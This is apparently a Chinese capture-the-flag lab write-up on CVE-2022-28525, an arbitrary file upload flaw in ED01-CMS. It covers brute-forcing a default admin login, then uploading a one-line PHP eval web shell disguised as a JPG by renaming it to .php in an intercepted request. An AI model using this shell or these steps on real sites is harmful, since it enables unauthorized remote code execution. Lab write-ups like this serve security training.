春秋云境 | 文件上传 | CVE-2022-28525

目录

靶标介绍

开启靶场

蚁剑连接

[获取 flag](#获取 flag)


靶标介绍

ED01-CMS v20180505 存在任意文件上传漏洞

开启靶场

发现了一个登录功能,使用 burp 爆破一下

爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面

在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像

构造一个一句话木马,重命名为 1.jpg

复制代码
1.jpg:
<?php @eval($_POST[cmd]);?>

勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包

放包之后,发现上传成功,右击复制图片链接

蚁剑连接

在根目录发现了 flag

获取 flag

相关推荐
冷雨夜中漫步6 小时前
Python快速入门(6)——for/if/while语句
开发语言·经验分享·笔记·python
九河云9 小时前
5秒开服,你的应用部署还卡在“加载中”吗?
大数据·人工智能·安全·机器学习·华为云
ShoreKiten10 小时前
ctfshowweb351-360
web安全·ssrf
Libraeking10 小时前
视觉篇:Canvas 自定义绘图与高级动画的华丽圆舞曲
android·经验分享·android jetpack
枷锁—sha10 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
方见华Richard11 小时前
自指-认知几何架构 可行性边界白皮书(务实版)
人工智能·经验分享·交互·原型模式·空间计算
桌面运维家12 小时前
vDisk安全启动策略怎么应用?防止恶意引导攻击
安全
我是一只puppy12 小时前
使用AI进行代码审查
javascript·人工智能·git·安全·源代码管理
LaughingZhu12 小时前
Product Hunt 每日热榜 | 2026-02-08
大数据·人工智能·经验分享·搜索引擎·产品运营
白帽子凯哥哥14 小时前
湖南网安基地:国家级实战化网安人才培养的“黄埔军校”
web安全·信息安全·零基础·渗透测试·安全服务